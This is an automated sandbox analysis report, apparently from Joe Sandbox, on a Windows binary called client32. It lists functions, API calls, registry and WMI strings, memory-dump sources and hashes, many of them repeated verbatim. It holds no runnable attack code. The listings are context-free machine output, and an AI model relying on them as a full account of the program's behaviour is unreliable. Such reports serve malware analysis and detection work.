                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                                                                                • API String ID: 999355418-161875503
                                                                                                                                                                • Opcode ID: 25c6060889b0532266d56abace0ba5fbfa4960398331d3b945ebf36f5c2f89a7
                                                                                                                                                                • Instruction ID: c47c75eefe38bee888b154a00c4449ad07b8701d7df13cace45a3bfee881b040
                                                                                                                                                                • Opcode Fuzzy Hash: 25c6060889b0532266d56abace0ba5fbfa4960398331d3b945ebf36f5c2f89a7
                                                                                                                                                                • Instruction Fuzzy Hash: E3A1B075A007469FE721CF64C880BABFBF8AF45308F044A5CE99697684E770F508CBA1
                                                                                                                                                                Function 1115BA20 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,59FD48C0,00000000,?), ref: 1115BA67
                                                                                                                                                                • CoCreateInstance.OLE32(111C4FEC,00000000,00000017,111C4F1C,?), ref: 1115BA87
                                                                                                                                                                • wsprintfW.USER32 ref: 1115BAA7
                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 1115BAB3
                                                                                                                                                                • wsprintfW.USER32 ref: 1115BB67
                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 1115BC08
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                                                                                • API String ID: 3050498177-823534439
                                                                                                                                                                • Opcode ID: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                                                                                • Instruction ID: 667e066b75244b2782fe63ff2368f72f8a2c2363a2cb4bcdb988270c73b3585f
                                                                                                                                                                • Opcode Fuzzy Hash: 576cfa077ff6f7d7422243c8d6aded75e2d45eb1edbb45dc90fee1c625149e70
                                                                                                                                                                • Instruction Fuzzy Hash: 7351B071B00219ABC764CF69CC84F9AF7B9FB8A714F1042A8E429E7240DA70AE40CF55
                                                                                                                                                                Function 11145440 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145330: RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                                                                                                  • Part of subcall function 11145330: RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                                                                                                • _memset.LIBCMT ref: 11145485
                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                • GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                                                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                • API String ID: 4251163631-545709139
                                                                                                                                                                • Opcode ID: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                                                                                • Instruction ID: 76ed8f4553af2ae4cc76032582d3c5cf4b75be54885724a55a46303ac3459834
                                                                                                                                                                • Opcode Fuzzy Hash: 60d783b5b5cd8942fc75307bb254099b366294b2f30fa269448a3e45cf09a56e
                                                                                                                                                                • Instruction Fuzzy Hash: 07313971E002299BD761DF74D984BE9F7B6EB08729F540164E42DC7A80D7344984CF91
                                                                                                                                                                Function 11015010 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 128registryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • wsprintfA.USER32 ref: 110150CA
                                                                                                                                                                • _memset.LIBCMT ref: 1101510E
                                                                                                                                                                • RegQueryValueExA.KERNEL32(?,PackedCatalogItem,00000000,?,?,?,?,?,00020019), ref: 11015148
                                                                                                                                                                Strings
                                                                                                                                                                • SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries, xrefs: 1101504B
                                                                                                                                                                • %012d, xrefs: 110150C4
                                                                                                                                                                • PackedCatalogItem, xrefs: 11015132
                                                                                                                                                                • NSLSP, xrefs: 11015158
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue_memsetwsprintf
                                                                                                                                                                • String ID: %012d$NSLSP$PackedCatalogItem$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries
                                                                                                                                                                • API String ID: 1333399081-1346142259
                                                                                                                                                                • Opcode ID: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                                                                                • Instruction ID: d38f3a4d66d5a90606c53f5b1b84405609ec5bb3b13ff7cea0d7775b25b40b12
                                                                                                                                                                • Opcode Fuzzy Hash: 51d8f863940591209aa48ee8c17907a3c30549026713edc7384ebfc6867c5eab
                                                                                                                                                                • Instruction Fuzzy Hash: C6419D71D02269AFEB11DB64CC90BDEF7B8EB44314F0445E9E819A7281EB35AB48CF50
                                                                                                                                                                Function 1100FDC0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100FDED
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100FE10
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100FE94
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1100FEA2
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100FEB5
                                                                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100FECF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                • API String ID: 2427920155-3145022300
                                                                                                                                                                • Opcode ID: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                                                                                • Instruction ID: 563b417412927bd42dfe2d2268ce551a617b01fe8fe711e168dc892134580a96
                                                                                                                                                                • Opcode Fuzzy Hash: a7aa4a6049a8ed817bef268ace451c424b01c27ab063a1090bc59c7f390f5fbb
                                                                                                                                                                • Instruction Fuzzy Hash: 5731E975D002669FD711DF94C890BAEF7B8EB04B68F10426DD921A7291DB717D40CB92
                                                                                                                                                                Function 111386B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK$e;
                                                                                                                                                                • API String ID: 536389180-3279045114
                                                                                                                                                                • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                                                                                • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                                                                                                • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                                                                                                • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                                                                                                Function 11144BD0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                                                • API String ID: 3494822531-1878648853
                                                                                                                                                                • Opcode ID: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                                                                                • Instruction ID: dd955378f98185685044f21f066d1e50e049b7277ab8e5714ac6db0ba135c9a8
                                                                                                                                                                • Opcode Fuzzy Hash: 942c5252def4268129969c39a1215845e921a51e2954e507dd92eff7077da9be
                                                                                                                                                                • Instruction Fuzzy Hash: AB518835D4022E5BD711CF24DC50BDEF7A4AF15B08F2401A4D8997BA80EBB27B84CBA5
                                                                                                                                                                Function 11107290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,776CC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                                                                                                  • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                                                                  • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                                                                  • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                                                                                                • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                                                                                                • std::exception::exception.LIBCMT ref: 11107414
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 11107429
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                                                                • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                                                • API String ID: 2851125068-2390547818
                                                                                                                                                                • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                                                                                • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                                                                                                • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                                                                                                • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                                                                                                Function 11017300 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71synchronizationCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002D8,000000FF), ref: 1101733C
                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                                                                                                • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                                                                                                • CoUninitialize.COMBASE ref: 110173D0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                                                                                                • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                                                                                                • API String ID: 2407233060-578995875
                                                                                                                                                                • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
